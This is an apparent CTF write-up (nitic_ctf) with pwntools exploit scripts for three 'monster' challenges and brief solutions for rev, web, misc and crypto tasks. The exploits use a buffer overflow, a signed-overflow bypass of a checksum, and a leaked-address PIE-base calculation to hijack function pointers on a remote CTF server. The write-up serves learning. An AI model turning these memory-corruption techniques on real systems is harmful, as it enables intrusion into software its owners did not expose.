Pwn

pwn monster 1

You can fight a monster.

There is an obvious buffer overflow in the name input, so overwrite your own monster's stats and make it the strongest.

#!/usr/bin/env python3
from pwn import *
binfile = 'vuln'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile  # sets arch/bits, so pack() emits 64-bit little-endian words
io = remote('35.200.120.35', 9001)

# skip the intro prompts
io.sendlineafter(b'Key', b'')
io.sendlineafter(b'World!', b'')
io.sendlineafter(b'monster!', b'')

# 16 bytes fill the name buffer; the two 8-byte stat fields that follow it both get INT64_MAX
payload = b'a' * 16 + pack(9223372036854775807) + pack(9223372036854775807)

io.sendlineafter(b'name!', payload)

io.interactive()

pwn monster 2

A checksum has been added.

By default hp + attack is 110, so the input is rejected unless the sum comes out to 110.

The checksum only fixes the sum, so pick hp = INT64_MAX and attack = 110 - INT64_MAX: the signed sum is still exactly 110, and the huge negative attack makes the enemy's HP overflow.

#!/usr/bin/env python3
from pwn import *
binfile = 'vuln'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile  # 64-bit words for pack()
io = remote('35.200.120.35', 9002)

# hp = INT64_MAX, attack = 110 - INT64_MAX: hp + attack == 110, so the checksum passes;
# pack() treats the negative value as signed and emits its two's-complement encoding
payload = b'a' * 16 + pack(9223372036854775807) + pack(-9223372036854775697)


io.sendlineafter(b'name', payload)

io.interactive()
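Why the stats in the script above pass the checksum and still take the enemy down, as an added worked example that is not part of the original writeup. It assumes the game keeps hp and attack as signed 64-bit integers, checks hp + attack == 110, and subtracts the player's attack from the enemy's HP in the same arithmetic; the page does not show the binary's source, so the damage model and the enemy's starting HP are assumptions. forge_stats() computes the attack that satisfies the checksum for any chosen hp (the script's constants are one instance), and simulate_hit() shows when the subtraction wraps.

```python
#!/usr/bin/env python3
"""Added example (not from the writeup): forging monster stats that satisfy an
additive checksum in signed 64-bit arithmetic and overflow the enemy's HP."""
from typing import Tuple

INT64_MAX = 2**63 - 1
MASK64 = 2**64 - 1
CHECKSUM = 110  # default hp + attack reported by the challenge


def to_i64(x: int) -> int:
    """Reduce an arbitrary Python int to the value a C int64_t would hold."""
    x &= MASK64
    return x - 2**64 if x > INT64_MAX else x


def forge_stats(hp: int, checksum: int = CHECKSUM) -> Tuple[int, int]:
    """Return (hp, attack) with hp + attack == checksum in int64 arithmetic.

    The checksum constrains only the sum, so hp is free; the matching attack
    is checksum - hp reduced to int64, which is hugely negative for a huge hp.
    """
    attack = to_i64(checksum - hp)
    assert to_i64(hp + attack) == checksum  # the check the game performs (assumed)
    return hp, attack


def simulate_hit(enemy_hp: int, attack: int) -> int:
    """Assumed damage model: enemy_hp -= attack, wrapping like int64_t."""
    return to_i64(enemy_hp - attack)


def main() -> None:
    hp, attack = forge_stats(INT64_MAX)
    print(f"hp={hp} attack={attack} sum={to_i64(hp + attack)}")
    # A negative attack "heals" the enemy, but adding 2**63 - 110 to any HP above
    # 110 overflows past INT64_MAX and wraps to a negative number (enemy dead).
    # With an enemy HP of 110 or less the sum stays in range and the trick fails.
    for enemy_hp in (100, 1000):  # constructed sample values, not from the game
        print(f"enemy_hp={enemy_hp} -> {simulate_hit(enemy_hp, attack)}")


if __name__ == "__main__":
    main()
```

The threshold follows from the assumed model: with hp = INT64_MAX the enemy's HP wraps exactly when it exceeds the checksum value, so the exploit relies on the enemy starting with more than 110 HP.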

pwn monster 3

The monster now carries function pointers, so overwrite them: the program leaks the address of my_monster_cry, which gives the PIE base, and from that the address of show_flag.

#!/usr/bin/env python3
from pwn import *
binfile = 'vuln'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile
io = remote('35.200.120.35', 9003)

# skip the banner; the 16th line prints the address of my_monster_cry
for _ in range(15):
    io.readline()

# the third whitespace-separated token of that line is the leaked hex address
cry_addr = int(io.readline().split()[2], 16)

# rebase: leak - symbol offset = PIE base, then add the offset of show_flag
show_flag = cry_addr - e.sym['my_monster_cry'] + e.sym['show_flag']

# 16 bytes of name, then the three function-pointer slots all pointed at show_flag
payload = b'a' * 16 + pack(show_flag) * 3

io.sendlineafter(b'name:', payload)

io.interactive()

Rev

protected

The flag shows up in the output of strings.

Web

web_meta

Found with grep.

long flag

Deleted the span tags in vim and the flag appeared.

Misc

Excel

Unzipped the file and grepped it, and the flag appeared.

image_conv

Found by fiddling around with the filters in stegsolve.

Crypto

Caesar Cipher

As the challenge name says.

ord_xor

#!/usr/bin/env python3

enc = 'nhtjcZcsfroydRx`rl'
dec = ''

# character i was XORed with its index i, i times: an even count cancels out,
# an odd count is equivalent to a single XOR with i
for i, c in enumerate(enc):
    tmp = ord(c)
    for _ in range(i):
        tmp ^= i
    dec += chr(tmp)

print(dec)  # nitic_ctf{ord_xor}

tanitu_kanji

Exhaustive search over the bit patterns: ten substitution rounds, each with one of two tables, so try all 2^10 orderings.

#!/usr/bin/env python3
alphabets = "abcdefghijklmnopqrstuvwxyz0123456789{}_"
after1 = "fl38ztrx6q027k9e5su}dwp{o_bynhm14aicjgv"
after2 = "rho5b3k17pi_eytm2f94ujxsdvgcwl{}a086znq"


def conv(s: str, table: str) -> str:
    # undo one substitution round: the character at position i of table came from alphabets[i]
    res = ""
    for c in s:
        i = table.index(c)
        res += alphabets[i]
    return res


# each bit of i selects which table to undo in that round; stop at the first
# ordering that yields the flag prefix
for i in range(1024):
    flag = "l0d0pipdave0dia244im6fsp8x"
    for f in format(i, '010b'):
        if f == "1":
            flag = conv(flag, after1)
        else:
            flag = conv(flag, after2)
    if flag.startswith('nitic_ctf{'):
        print(flag)
        exit(0)